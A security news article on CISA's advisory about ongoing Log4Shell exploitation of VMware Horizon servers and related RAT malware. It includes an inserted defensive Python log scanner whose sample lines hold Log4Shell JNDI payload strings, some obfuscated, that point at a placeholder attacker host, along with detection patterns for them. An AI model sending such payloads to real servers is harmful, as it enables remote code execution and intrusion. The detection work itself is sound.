Cyber actors continue to exploit Log4Shell vulnerability (CVE-2021-44228) in VMware Horizon Systems (updated)

Cybersecurity experts warn cyber actors continue to exploit the Log4Shell vulnerability in VMware Horizon Systems.

Updated July 20, 2022: This post has been updated to include new indicators of compromise (IoC) as provided in CISA malware analysis report on July 18.

Last December, researchers discovered the critical Log4Shell vulnerability (CVE-2021-44228) in the Apache Log4j logging utility, which can result in remote code execution (RCE) when the library logs a specially crafted string. The severe flaw affected many consumer and enterprise services, websites, applications, and other products.
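Because the trigger is a string that the application merely logs, the most useful defender-side check for an environment like the Horizon servers in this advisory is to sweep web-server and application logs for the lookup syntax, including the nested-lookup obfuscations that plain substring matching misses. The following Python script is an added example, not code from the article, CISA, or VMware; the access-log lines, the IP addresses, and the `attacker.invalid` hostname are constructed placeholders.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the advisory or the MARs).
# Lines 2-4 carry Log4Shell-style JNDI lookup strings; line 3 is URL-encoded and
# lines 3 and 4 use nested-lookup obfuscation that naive substring matching misses.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Jan/2022:08:00:01 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jan/2022:08:00:02 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.invalid/a}"',
    '203.0.113.9 - - [10/Jan/2022:08:00:03 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A%2F%2Fattacker.invalid%2Fb%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '203.0.113.11 - - [10/Jan/2022:08:00:04 +0000] "GET /portal HTTP/1.1" 200 512 "-" "${jndi:${::-l}${::-d}ap://attacker.invalid/c}"',
    '203.0.113.13 - - [10/Jan/2022:08:00:05 +0000] "GET /favicon.ico HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

# Innermost ${lower:x} / ${upper:x} lookups: Log4j evaluates these to x with the case changed.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# Innermost ${key:-default} lookups with an unresolvable key (e.g. ${::-l}) evaluate to the default.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# The lookup that triggers the vulnerable JNDI resolution, once the string is normalized.
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:[^}]*\}", re.IGNORECASE)
_JNDI_SCHEME = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+):", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse nested case/default lookups the way Log4j 2.x would, innermost first."""
    for _ in range(max_rounds):
        reduced = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        reduced = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), reduced)
        if reduced == text:
            break
        text = reduced
    return text


def find_log4shell_attempts(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per log line that contains a (possibly obfuscated) ${jndi:...} lookup."""
    findings = []
    for line_no, raw in enumerate(lines, start=1):
        # Web servers usually log the request line URL-encoded; decode before normalizing.
        decoded = normalize_lookups(unquote(raw))
        match = _JNDI_LOOKUP.search(decoded)
        if not match:
            continue
        payload = match.group(0)
        scheme = _JNDI_SCHEME.match(payload)
        findings.append({
            "line_no": line_no,
            "client_ip": raw.split(" ", 1)[0],  # first field of a combined-format log line
            "payload": payload,
            "scheme": scheme.group(1).lower() if scheme else None,
        })
    return findings


if __name__ == "__main__":
    for hit in find_log4shell_attempts(SAMPLE_LOG_LINES):
        print(f"line {hit['line_no']}: {hit['client_ip']} -> {hit['scheme']} lookup {hit['payload']}")
```

A hit in these logs shows an attempt, not a successful compromise: confirm by checking whether the server's Log4j version was still vulnerable at that time and whether outbound LDAP/RMI connections to the named host followed, which is the kind of follow-on evidence the incident-response engagements described below rely on.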

Researchers and technology vendors soon followed with new reports of multiple exploits against Log4Shell, such as cyberattacks from Aquatic Panda and Deep Panda. This past April, researchers discovered millions of Java applications were still vulnerable in the wild to Log4Shell.

In a new joint cybersecurity advisory, the Cybersecurity and Infrastructure Security Agency (CISA) and the United States Coast Guard Cyber Command (CGCYBER) warned that cyber threat actors continue to exploit CVE-2021-44228 in unpatched VMware Horizon and Unified Access Gateway (UAG) servers. These actors include state-sponsored advanced persistent threat (APT) groups.

“Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and UAG servers. As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2),” CISA wrote in the alert.

In December 2021, VMware released a patch for CVE-2021-44228 and also confirmed exploitation in the wild at that time.

After performing an onsite incident response engagement for a customer from April to May 2022, CISA found evidence that actors had been exploiting an unpatched VMware Horizon server since January of this year.

CISA also observed a second threat actor group had access to another organization’s test and production environments. As a result, the actor also exploited CVE-2022-22954 to implant the Dingo J-spy webshell.

Latest malware reports

CISA and CGCYBER previously released two related Malware Analysis Reports (MARs), MAR-10382580-1 and MAR-10382254-1, after discovering new malware samples from victims of Log4Shell exploitation.

New IoCs were also added as part of MAR-10382580-2, published on July 18, 2022:

“This file is a malicious loader that contains an embedded executable. This embedded executable is a Remote Access Tool (RAT) that provides a vast array of Command and Control (C2) capabilities. These C2 capabilities include the ability to remotely monitor a system’s desktop, gain reverse shell access, exfiltrate data, and upload and execute additional payloads. The malware can also function as a proxy, allowing a remote operator to pivot to other systems,” CISA noted in the report.
